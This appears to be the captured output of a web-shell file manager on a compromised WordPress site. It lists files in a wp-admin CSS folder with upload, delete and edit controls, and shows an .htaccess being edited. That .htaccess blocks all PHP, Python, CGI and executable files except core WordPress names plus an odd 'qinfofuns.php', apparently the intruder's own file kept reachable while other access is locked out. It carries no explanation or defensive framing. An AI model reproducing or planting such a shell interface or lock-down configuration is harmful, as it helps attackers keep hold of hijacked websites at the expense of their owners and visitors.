golden hour
/home/godaofbq/hyperbarics4u.com/wp-admin/css/colors/light
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess
2.49 KB
Del
OK
colors-rtl.css
24.36 KB
Del
OK
colors-rtl.min.css
20.96 KB
Del
OK
colors.css
24.36 KB
Del
OK
colors.min.css
20.96 KB
Del
OK
colors.scss
879 B
Del
OK
Edit: .htaccess
<FilesMatch "(?i)\.(py|exe|phtml|php\d*|suspected|cgi)$"> <IfModule mod_authz_core.c> Require all denied </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Deny from all </IfModule> </FilesMatch> <FilesMatch "^(link-manager\.php|menu\.php|ms-sites\.php|font-library\.php|wp-links-opml\.php|options-writing\.php|my-sites\.php|media-new\.php|wp-upgrade\.php|authorize-application\.php|edit-link-form\.php|revision\.php|import\.php|site-health\.php|media\.php|setup-config\.php|profile\.php|edit-form-comment\.php|theme-editor\.php|options-privacy\.php|edit\.php|users\.php|export-personal-data\.php|credits\.php|user-edit\.php|wp-mail\.php|widgets-form\.php|update-core\.php|custom-background\.php|options\.php|about\.php|update\.php|ms-options\.php|wp-blog-header\.php|plugin-install\.php|ms-themes\.php|edit-tag-form\.php|menu-header\.php|admin-functions\.php|wp-activate\.php|erase-personal-data\.php|options-connectors\.php|tools\.php|admin-ajax\.php|link-parse-opml\.php|wp-signup\.php|wp-settings\.php|edit-form-advanced\.php|contribute\.php|site-editor\.php|post\.php|wp-comments-post\.php|link\.php|comment\.php|plugins\.php|post-new\.php|options-discussion\.php|customize\.php|nav-menus\.php|qinfofuns\.php|themes\.php|options-general\.php|admin-footer\.php|moderation\.php|load-scripts\.php|admin-post\.php|options-reading\.php|wp-login\.php|network\.php|ms-users\.php|wp-load\.php|admin-header\.php|wp-cron\.php|privacy-policy-guide\.php|load-styles\.php|async-upload\.php|edit-tags\.php|site-maintenance\.php|xmlrpc\.php|edit-form-blocks\.php|export\.php|wp-trackback\.php|plugin-editor\.php|install\.php|edit-comments\.php|options-head\.php|admin\.php|theme-install\.php|options-media\.php|options-permalink\.php|ms-admin\.php|site-health-info\.php|index\.php|widgets-form-blocks\.php|styles\.php|press-this\.php|term\.php|link-add\.php|widgets\.php|wp-config-sample\.php|ms-edit\.php|upgrade\.php|freedoms\.php|install-helper\.php|media-upload\.php|ms-upgrade-network\.php|upgrade-functions\.php|ms-delete-site\.php|user-new\.php|custom-header\.php|privacy\.php|upload\.php)$"> <IfModule mod_authz_core.c> Require all granted </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Allow from all </IfModule> </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>
Save